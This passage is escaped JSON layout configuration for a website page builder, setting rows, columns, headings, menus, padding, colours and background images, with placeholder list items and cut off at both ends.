ype\":\"hop-logo\",\"nodeId\":\"22-h84\",\"nodes\":[\"22-h5\"],\"v\":\"1.1\"},{\"id\":248,\"style\":{\"padding\":{\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"},\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"}},\"descendants\":{\"outer\":{\"padding\":{\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"},\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"}}}}},\"props\":{\"verticalAlign\":\"center\",\"hide\":{\"mobile\":true}},\"type\":\"hop-column\",\"nodeId\":\"22-h85\",\"nodes\":[\"22-h6\"],\"v\":\"1.1\"},{\"id\":249,\"style\":{\"padding\":{\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"},\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"}},\"descendants\":{\"outer\":{\"padding\":{\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"},\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"}}}}},\"props\":{\"verticalAlign\":\"center\"},\"type\":\"hop-column\",\"nodeId\":\"22-h86\",\"nodes\":[\"22-h7\"],\"v\":\"1.1\"},{\"id\":250,\"type\":\"hop-horizontal-menu\",\"nodeId\":\"22-h87\",\"nodes\":[\"22-h8\"],\"v\":\"1.1\"},{\"id\":251,\"type\":\"hop-mobile-menu\",\"nodeId\":\"22-h88\",\"nodes\":[\"22-h9\"],\"v\":\"1.1\"},{\"id\":252,\"type\":\"hop-offscreen-panel\",\"nodeId\":\"22-h89\",\"nodes\":[\"22-h10\"],\"v\":\"1.1\"},{\"id\":253,\"style\":{\"descendants\":{\"link\":{\"typography\":{\"color\":\"white\"}},\"submenu-item-link\":{\"typography\":{\"color\":\"white\"}},\"iconOption\":{\"typography\":{\"color\":\"white\"}},\"subMenuIcon\":{\"typography\":{\"color\":\"white\"}}}},\"props\":{\"layout\":\"accordion\"},\"type\":\"hop-accordion-menu\",\"nodeId\":\"22-h90\",\"nodes\":[\"22-h11\"],\"v\":\"1.1\"},{\"id\":254,\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"type\":\"hop-row\",\"nodeId\":\"22-h91\",\"nodes\":[\"22-h12\"],\"v\":\"1.1\"},{\"id\":255,\"props\":{\"layout\":{\"horizontalInnerGap\":2,\"verticalInnerGap\":2}},\"type\":\"hop-column\",\"nodeId\":\"22-h92\",\"nodes\":[\"22-h13\"],\"v\":\"1.1\"},{\"id\":256,\"type\":\"hop-logo\",\"nodeId\":\"22-h93\",\"nodes\":[\"22-h14\"],\"v\":\"1.1\"},{\"id\":257,\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"type\":\"hop-row\",\"nodeId\":\"22-h94\",\"nodes\":[\"22-h15\"],\"v\":\"1.1\"},{\"id\":258,\"props\":{\"layout\":{\"horizontalInnerGap\":2,\"verticalInnerGap\":2}},\"type\":\"hop-column\",\"nodeId\":\"22-h95\",\"nodes\":[\"22-h16\"],\"v\":\"1.1\"},{\"id\":259,\"type\":\"hop-text\",\"nodeId\":\"22-h96\",\"nodes\":[\"22-h17\"],\"v\":\"1.1\"},{\"id\":260,\"type\":\"hop-top-bar\",\"props\":{\"width\":\"boxed\"},\"v\":\"1.1\",\"nodes\":[\"22-h18\"]},{\"id\":261,\"style\":{\"background\":{\"color\":\"black\"},\"padding\":{\"top\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"bottom\":{\"value\":\"5\",\"unit\":\"px\"},\"left\":{\"unit\":\"px\"}}},\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0},\"fullBackground\":true,\"hide\":{\"mobile\":true}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"22-h19\"]},{\"id\":262,\"props\":{\"verticalAlign\":\"center\"},\"type\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}}},\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}},\"textAlign\":\"left\"},\"v\":\"1.1\",\"nodes\":[\"22-h20\"]},{\"id\":263,\"type\":\"hop-icon-list\",\"style\":{\"descendants\":{\"li\":{\"padding\":{\"right\":{\"value\":0,\"unit\":\"px\"},\"bottom\":{\"value\":0,\"unit\":\"px\"}}},\"divider\":{\"border\":{\"left\":{\"width\":{\"value\":1,\"unit\":\"px\"}},\"bottom\":{\"width\":{\"value\":0,\"unit\":\"px\"}}},\"height\":{\"value\":100,\"unit\":\"%\"}},\"containerDivider\":{\"height\":{\"value\":100,\"unit\":\"%\"},\"width\":{\"value\":1,\"unit\":\"px\"},\"padding\":{\"left\":{\"value\":10,\"unit\":\"px\"},\"top\":{\"value\":0,\"unit\":\"px\"},\"right\":{\"value\":10,\"unit\":\"px\"},\"bottom\":{\"value\":0,\"unit\":\"px\"}}},\"icon\":{\"width\":{\"path\":\"value\",\"value\":\"18\"},\"fill\":\"${theme.colors.4}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.4}\",\"background\":{\"color\":\"rgba(3, 169, 244, 0)\"}}},\"height\":{\"path\":\"value\",\"value\":\"18\"},\"border\":{\"top\":{\"style\":\"none\",\"radius\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"}},\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\"},\"right\":{\"style\":\"none\",\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\"},\"bottom\":{\"style\":\"none\",\"radius\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"}},\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\"},\"left\":{\"style\":\"none\",\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\"}},\"padding\":{\"top\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"},\"left\":{\"value\":\"0\",\"unit\":\"px\",\"path\":\"value\"}}},\"text\":{\"margin\":{\"left\":{\"path\":\"value\",\"value\":\"5\"}},\"color\":\"${theme.colors.4}\",\"typography\":{\"size\":{\"unit\":\"px\",\"value\":\"14\"}}},\"list-item\":{\"padding\":{\"right\":{\"value\":0,\"unit\":\"px\"},\"bottom\":{\"value\":0,\"unit\":\"px\"}},\"horizontalAlign\":\"start\"}}},\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"newWindow\":false,\"noFollow\":false},\"text\":\"List item #1\",\"allIcons\":false,\"icon\":\"font-awesome\\/check\",\"type\":\"svg\",\"id\":0.15907223444395013},{\"title\":\"List\",\"link\":{\"newWindow\":false,\"noFollow\":false},\"text\":\"List item #2\",\"allIcons\":false,\"icon\":\"font-awesome\\/check\",\"type\":\"svg\",\"id\":0.34341111083051734},{\"title\":\"List\",\"link\":{\"newWindow\":false,\"noFollow\":false},\"text\":\"List item #3\",\"allIcons\":false,\"icon\":\"font-awesome\\/check\",\"type\":\"svg\",\"id\":0.0941660601972718},{\"title\":\"List\",\"link\":{\"newWindow\":false,\"noFollow\":false},\"text\":\"List item #4\",\"allIcons\":false,\"icon\":\"font-awesome\\/check\",\"type\":\"svg\",\"id\":0.5295691579821964}],\"iconAndTextAlign\":\"center\",\"listLayout\":\"horizontal\"},\"v\":\"1.1\",\"nodes\":[\"22-h21\"]},{\"id\":264,\"props\":{\"verticalAlign\":\"center\"},\"type\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}}},\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}},\"v\":\"1.1\",\"nodes\":[\"22-h22\"]},{\"id\":265,\"type\":\"hop-social-icons\",\"style\":{\"descendants\":{\"icon-content\":{\"fill\":\"${theme.colors.4|variant1}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.4}\"}},\"width\":{\"value\":\"20\"},\"height\":{\"value\":\"20\"}},\"icon\":{\"margin\":{\"right\":{\"value\":\"0\"}},\"padding\":{\"top\":{\"value\":\"5\"},\"left\":{\"value\":\"5\"},\"bottom\":{\"value\":\"5\"},\"right\":{\"value\":\"5\"}}}}},\"props\":{\"horizontalAlign\":\"end\",\"media\":{\"mobile\":{\"horizontalAlign\":\"center\"}},\"hide\":{\"mobile\":false}},\"v\":\"1.1\",\"nodes\":[\"22-h23\"]},{\"id\":266,\"type\":\"hop-footer\",\"v\":\"1.1\",\"nodes\":[\"28-f1\"],\"style\":{\"background\":{\"color\":\"${theme.colors.4}\"}},\"props\":{\"useFooterParallax\":true}},{\"id\":267,\"type\":\"hop-section\",\"style\":{\"padding\":{\"top\":{\"path\":\"value\",\"value\":\"30\"},\"bottom\":{\"path\":\"value\",\"value\":\"30\"}},\"customHeight\":{\"min-height\":{\"unit\":\"px\",\"value\":\"115\"},\"type\":\"min-height\"}},\"v\":\"1.1\",\"nodes\":[\"28-f2\"],\"props\":{\"verticalAlign\":\"end\"}},{\"id\":268,\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalInnerGap\":1,\"verticalGap\":1,\"horizontalGap\":1},\"media\":{\"mobile\":{\"layout\":{\"verticalGap\":2,\"horizontalGap\":2}}}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"28-f3\"]},{\"id\":269,\"type\":\"hop-column\",\"props\":{\"layout\":{\"vSpace\":{\"value\":\"0\"},\"horizontalInnerGap\":1,\"verticalInnerGap\":1},\"media\":{\"mobile\":{\"layout\":{\"horizontalInnerGap\":2,\"verticalInnerGap\":2}}}},\"style\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}},\"media\":{\"mobile\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}}},\"descendants\":{\"outer\":{\"media\":{\"mobile\":{\"padding\":{\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"},\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"}}}}}}},\"v\":\"1.1\",\"nodes\":[\"28-f4\"]},{\"id\":270,\"type\":\"hop-copyright\",\"v\":\"1.1\",\"nodes\":[\"28-f5\"]},{\"id\":271,\"type\":\"hop-section\",\"style\":{\"padding\":{\"top\":{\"path\":\"value\",\"value\":\"0\"}},\"media\":{\"mobile\":{\"margin\":{\"top\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"},\"left\":{\"unit\":\"px\"}}}},\"descendants\":{\"inner\":{\"margin\":{\"top\":{\"value\":-75,\"unit\":\"px\",\"path\":\"value\"}}}},\"background\":{\"color\":\"rgba(255, 255, 255, 0.43)\"}},\"v\":\"1.1\",\"nodes\":[\"20-c2\"]},{\"id\":272,\"props\":{\"layout\":{\"equalWidth\":true,\"itemsPerRow\":3},\"media\":{\"mobile\":{\"layout\":{\"horizontalGap\":2}},\"tablet\":{\"layout\":{\"horizontalGap\":0,\"verticalGap\":0}}}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"20-c9\"]},{\"id\":273,\"type\":\"hop-column\",\"props\":{\"layout\":{\"horizontalInnerGap\":2,\"verticalInnerGap\":0},\"media\":{\"mobile\":{\"layout\":{\"verticalInnerGap\":2}},\"tablet\":{\"layout\":{\"horizontalInnerGap\":3,\"verticalInnerGap\":3}}}},\"style\":{\"descendants\":{\"outer\":{\"media\":{\"mobile\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"}}},\"tablet\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}}}}},\"media\":{\"mobile\":{\"padding\":{\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}},\"tablet\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}}}},\"v\":\"1.1\",\"nodes\":[\"20-c10\",\"20-c14\",\"20-c18\"]},{\"id\":274,\"type\":\"hop-icon\",\"style\":{\"descendants\":{\"icon\":{\"fill\":\"${theme.colors.4}\",\"background\":{\"color\":\"${theme.colors.0}\"},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}}},\"padding\":{\"top\":{\"path\":\"value\",\"value\":\"20\",\"unit\":\"px\"},\"left\":{\"path\":\"value\",\"value\":\"20\",\"unit\":\"px\"},\"right\":{\"path\":\"value\",\"value\":\"20\",\"unit\":\"px\"},\"bottom\":{\"path\":\"value\",\"value\":\"20\",\"unit\":\"px\"}},\"width\":{\"path\":\"value\",\"value\":\"80\"},\"height\":{\"path\":\"value\",\"value\":\"80\"},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"color\":\"rgba(49, 52, 57, 0.3)\",\"blur\":\"30\",\"y\":\"10\"}]},\"margin\":{\"top\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"bottom\":{\"value\":\"10\",\"unit\":\"px\"},\"left\":{\"unit\":\"px\"}}}},\"boxShadow\":{\"enabled\":false}},\"v\":\"1.1\",\"nodes\":[\"20-c11\",\"20-c15\",\"20-c19\"]},{\"id\":275,\"type\":\"hop-heading\",\"style\":{\"typography\":{\"transform\":\"uppercase\",\"letterSpacing\":{\"unit\":\"px\",\"value\":\"1\"}}},\"props\":{\"headerType\":\"5\"},\"v\":\"1.1\",\"nodes\":[\"20-c12\",\"20-c16\",\"20-c20\"]},{\"id\":276,\"type\":\"hop-text\",\"v\":\"1.1\",\"nodes\":[\"20-c13\",\"20-c17\",\"20-c21\"]},{\"id\":277,\"type\":\"hop-content\",\"nodeId\":\"126-c1\",\"nodes\":[\"126-c1\"],\"style\":[],\"v\":\"1.1\"},{\"id\":278,\"nodeId\":\"25-h28\",\"nodes\":[\"25-h28\"],\"v\":\"1.1\"},{\"id\":279,\"type\":\"hop-content\",\"nodeId\":\"122-c1\",\"nodes\":[\"122-c1\"],\"style\":[],\"v\":\"1.1\"},{\"id\":280,\"type\":\"hop-content\",\"nodeId\":\"122-c1\",\"nodes\":[\"122-c1\"],\"v\":\"1.1\"},{\"id\":285,\"type\":\"hop-section\",\"v\":\"1.1\",\"nodes\":[\"122-c2\"],\"style\":{\"background\":{\"color\":\"#F5FAFD\"}}},{\"id\":286,\"props\":{\"layout\":{\"equalWidth\":false,\"verticalGap\":0,\"horizontalGap\":0}},\"type\":\"hop-row\",\"style\":{\"media\":{\"mobile\":{\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"15\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"15\",\"unit\":\"px\"}}}}},\"v\":\"1.1\",\"nodes\":[\"122-c3\"]},{\"id\":287,\"type\":\"hop-column\",\"style\":{\"background\":{\"color\":\"${theme.colors.4}\"},\"textAlign\":\"left\",\"padding\":{\"top\":{\"value\":\"15\",\"unit\":\"%\"},\"right\":{\"value\":\"20\",\"unit\":\"%\"},\"bottom\":{\"value\":\"15\",\"unit\":\"%\"},\"left\":{\"value\":\"20\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"%\"},\"right\":{\"value\":\"10\",\"unit\":\"%\"},\"bottom\":{\"value\":\"10\",\"unit\":\"%\"},\"left\":{\"value\":\"10\",\"unit\":\"%\"}},\"margin\":{\"top\":{\"unit\":\"%\"},\"right\":{\"unit\":\"%\"},\"bottom\":{\"unit\":\"%\"},\"left\":{\"value\":\"0\",\"unit\":\"%\"}},\"textAlign\":\"center\",\"transform\":{\"translate\":{\"x\":{\"value\":\"0\"}}}},\"tablet\":{\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"%\"},\"right\":{\"value\":\"15\",\"unit\":\"%\"},\"bottom\":{\"value\":\"10\",\"unit\":\"%\"},\"left\":{\"value\":\"15\",\"unit\":\"%\"}},\"transform\":{\"translate\":{\"x\":{\"value\":\"5\"}}}}},\"transform\":{\"translate\":{\"x\":{\"value\":\"6\",\"unit\":\"%\"},\"y\":{\"value\":0,\"unit\":\"%\"}}},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}}},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"color\":\"rgba(0, 0, 0, 0.15)\",\"blur\":\"15\",\"y\":\"5\"}]}},\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"v\":\"1.1\",\"nodes\":[\"122-c4\"]},{\"id\":288,\"type\":\"hop-heading\",\"props\":{\"headerType\":\"5\"},\"v\":\"1.1\",\"nodes\":[\"122-c5\"]},{\"id\":289,\"type\":\"hop-heading\",\"props\":{\"headerType\":\"4\"},\"style\":{\"media\":{\"mobile\":{\"typography\":{\"size\":{\"unit\":\"em\",\"value\":\"2.5\"}}},\"tablet\":{\"typography\":{\"size\":{\"unit\":\"em\",\"value\":\"2.5\"}}}},\"textAlign\":\"left\"},\"v\":\"1.1\",\"nodes\":[\"122-c6\"]},{\"id\":290,\"type\":\"hop-text\",\"v\":\"1.1\",\"nodes\":[\"122-c7\"]},{\"id\":291,\"type\":\"hop-column\",\"style\":{\"background\":{\"type\":\"image\",\"image\":[{\"source\":{\"type\":\"image\",\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/02\\/cropped-cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1.webp\"},\"position\":\"center center\"}]},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"spread\":\"2\",\"color\":\"rgba(0, 0, 0, 0.15)\",\"y\":\"10\",\"blur\":\"30\"}]},\"media\":{\"mobile\":{\"customHeight\":{\"type\":\"min-height\",\"min-height\":{\"value\":\"350\"}},\"margin\":{\"top\":{\"value\":\"0\",\"unit\":\"%\"},\"right\":{\"value\":\"0\",\"unit\":\"%\"},\"bottom\":{\"value\":\"0\",\"unit\":\"%\"},\"left\":{\"value\":\"0\",\"unit\":\"%\"}},\"transform\":{\"translate\":{\"x\":{\"value\":\"0\"},\"y\":{\"value\":\"-5\"}}}},\"tablet\":{\"transform\":{\"translate\":{\"x\":{\"value\":\"-5\"}}}}},\"margin\":{\"top\":{\"value\":\"10\",\"unit\":\"%\"},\"right\":{\"unit\":\"%\"},\"bottom\":{\"value\":\"10\",\"unit\":\"%\"},\"left\":{\"unit\":\"%\"}},\"transform\":{\"translate\":{\"x\":{\"value\":\"-6\",\"unit\":\"%\"},\"y\":{\"value\":0,\"unit\":\"%\"}}},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}}}},\"v\":\"1.1\",\"nodes\":[\"122-c8\"]},{\"id\":292,\"type\":\"hop-section\",\"v\":\"1.1\",\"nodes\":[\"122-c16\"],\"style\":{\"background\":{\"color\":\"${theme.colors.4}\"}}},{\"id\":293,\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0}},\"type\":\"hop-row\",\"style\":{\"media\":{\"mobile\":{\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"15\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"15\",\"unit\":\"px\"}}}}},\"v\":\"1.1\",\"nodes\":[\"122-c17\"]},{\"id\":294,\"type\":\"hop-column\",\"style\":{\"background\":{\"type\":\"image\",\"image\":[{\"source\":{\"type\":\"image\",\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-disaster1-scaled-1.jpg\"},\"position\":\"center center\"}]},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"spread\":\"2\",\"color\":\"rgba(0, 0, 0, 0.15)\",\"blur\":\"30\",\"y\":\"10\"}]},\"zIndex\":\"1\",\"margin\":{\"top\":{\"value\":\"10\",\"unit\":\"%\"},\"right\":{\"unit\":\"%\"},\"bottom\":{\"value\":\"10\",\"unit\":\"%\"},\"left\":{\"unit\":\"%\"}},\"media\":{\"mobile\":{\"margin\":{\"top\":{\"value\":\"0\",\"unit\":\"%\"},\"right\":{\"value\":\"0\",\"unit\":\"%\"},\"bottom\":{\"value\":\"0\",\"unit\":\"%\"},\"left\":{\"value\":\"0\",\"unit\":\"%\"}},\"customHeight\":{\"type\":\"min-height\",\"min-height\":{\"value\":\"350\"}},\"transform\":{\"translate\":{\"x\":{\"value\":\"0\"},\"y\":{\"value\":\"5\"}}}},\"tablet\":{\"transform\":{\"translate\":{\"x\":{\"value\":\"5\"}}}}},\"transform\":{\"translate\":{\"x\":{\"value\":\"6\",\"unit\":\"%\"},\"y\":{\"value\":0,\"unit\":\"%\"}}},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}}}},\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"v\":\"1.1\",\"nodes\":[\"122-c18\"]},{\"id\":295,\"type\":\"hop-column\",\"style\":{\"textAlign\":\"left\",\"background\":{\"color\":\"${theme.colors.4}\"},\"padding\":{\"top\":{\"value\":\"15\",\"unit\":\"%\"},\"right\":{\"value\":\"20\",\"unit\":\"%\"},\"bottom\":{\"value\":\"15\",\"unit\":\"%\"},\"left\":{\"value\":\"20\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"margin\":{\"top\":{\"value\":\"0\",\"unit\":\"%\"},\"right\":{\"value\":\"0\",\"unit\":\"%\"},\"bottom\":{\"value\":\"0\",\"unit\":\"%\"},\"left\":{\"value\":\"0\",\"unit\":\"%\"}},\"textAlign\":\"center\",\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"%\"},\"right\":{\"value\":\"10\",\"unit\":\"%\"},\"bottom\":{\"value\":\"10\",\"unit\":\"%\"},\"left\":{\"value\":\"10\",\"unit\":\"%\"}},\"transform\":{\"translate\":{\"x\":{\"value\":\"0\"}}}},\"tablet\":{\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"%\"},\"right\":{\"value\":\"15\",\"unit\":\"%\"},\"bottom\":{\"value\":\"10\",\"unit\":\"%\"},\"left\":{\"value\":\"15\",\"unit\":\"%\"}},\"transform\":{\"translate\":{\"x\":{\"value\":\"-5\"}}}}},\"transform\":{\"translate\":{\"x\":{\"value\":\"-6\",\"unit\":\"%\"},\"y\":{\"value\":0,\"unit\":\"%\"}}},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"color\":\"rgba(0, 0, 0, 0.15)\",\"blur\":\"15\",\"y\":\"5\"}]},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}}}},\"v\":\"1.1\",\"nodes\":[\"122-c19\"]},{\"id\":296,\"type\":\"hop-heading\",\"props\":{\"headerType\":\"5\"},\"v\":\"1.1\",\"nodes\":[\"122-c20\"]},{\"id\":298,\"type\":\"hop-text\",\"v\":\"1.1\",\"nodes\":[\"122-c21\"]},{\"id\":314,\"type\":\"hop-section\",\"nodeId\":\"122-c35\",\"nodes\":[\"122-c9\"],\"v\":\"1.1\",\"style\":{\"background\":{\"color\":\"${theme.colors.4}\"},\"padding\":{\"top\":{\"value\":0},\"bottom\":{\"value\":0}}}},{\"id\":317,\"props\":{\"layout\":{\"equalWidth\":false,\"equalHeight\":false}},\"type\":\"hop-row\",\"nodeId\":\"122-c38\",\"nodes\":[\"122-c13\"],\"v\":\"1.1\"},{\"id\":318,\"type\":\"hop-column\",\"nodeId\":\"122-c39\",\"nodes\":[\"122-c14\"],\"v\":\"1.1\"},{\"id\":319,\"type\":\"hop-text\",\"nodeId\":\"122-c40\",\"nodes\":[\"122-c15\"],\"v\":\"1.1\",\"style\":{\"typography\":{\"holders\":{\"p\":{\"size\":{\"unit\":\"px\",\"value\":\"20\"},\"weight\":\"400\",\"family\":\"Baloo\"}}}},\"props\":{\"type\":\"normal\"}},{\"id\":321,\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"type\":\"hop-row\",\"nodeId\":\"122-c42\",\"nodes\":[\"122-c10\"],\"v\":\"1.1\"},{\"id\":322,\"type\":\"hop-column\",\"nodeId\":\"122-c43\",\"nodes\":[\"122-c11\"],\"v\":\"1.1\",\"style\":{\"descendants\":{\"outer\":{\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}}}},\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}}}},{\"id\":324,\"type\":\"hop-heading\",\"nodeId\":\"122-c45\",\"nodes\":[\"122-c12\"],\"v\":\"1.1\",\"style\":{\"typography\":{\"weight\":\"600\"}},\"props\":{\"headerType\":\"4\"}},{\"id\":329,\"type\":\"hop-column\",\"nodeId\":\"20-c24\",\"nodes\":[\"20-c24\"],\"v\":\"1.1\",\"style\":{\"media\":{\"mobile\":[],\"tablet\":[]}}},{\"id\":330,\"type\":\"hop-heading\",\"nodeId\":\"20-c25\",\"nodes\":[\"20-c25\"],\"v\":\"1.1\",\"style\":{\"media\":{\"mobile\":[],\"tablet\":[]}}},{\"id\":331,\"props\":{\"layout\":{\"equalWidth\":false}},\"type\":\"hop-row\",\"nodeId\":\"20-c26\",\"nodes\":[\"20-c6\"],\"v\":\"1.1\"},{\"id\":333,\"type\":\"hop-column\",\"nodeId\":\"20-c28\",\"nodes\":[\"20-c7\"],\"v\":\"1.1\"},{\"id\":334,\"type\":\"hop-heading\",\"nodeId\":\"20-c29\",\"nodes\":[\"20-c8\"],\"v\":\"1.1\"},{\"id\":335,\"props\":{\"layout\":{\"equalWidth\":false}},\"type\":\"hop-row\",\"nodeId\":\"20-c30\",\"nodes\":[\"20-c3\"],\"v\":\"1.1\"},{\"id\":336,\"type\":\"hop-column\",\"nodeId\":\"20-c31\",\"nodes\":[\"20-c4\"],\"v\":\"1.1\"},{\"id\":337,\"type\":\"hop-column\",\"nodeId\":\"20-c32\",\"nodes\":[\"20-c5\"],\"v\":\"1.1\"},{\"id\":338,\"type\":\"hop-content\",\"nodeId\":\"126-c1\",\"nodes\":[\"126-c1\"],\"v\":\"1.1\"},{\"id\":339,\"type\":\"hop-section\",\"v\":\"1.1\",\"nodes\":[\"126-c2\"],\"style\":{\"background\":{\"color\":\"#F5FAFD\"}},\"props\":{\"width\":\"full-width\"}},{\"id\":340,\"props\":{\"layout\":{\"equalWidth\":false,\"verticalGap\":0,\"horizontalGap\":0}},\"type\":\"hop-row\",\"style\":{\"media\":{\"mobile\":{\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"15\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"15\",\"unit\":\"px\"}}}}},\"v\":\"1.1\",\"nodes\":[\"126-c3\"]},{\"id\":341,\"type\":\"hop-column\",\"style\":{\"background\":{\"color\":\"${theme.colors.4}\"},\"textAlign\":\"left\",\"padding\":{\"top\":{\"value\":\"15\",\"unit\"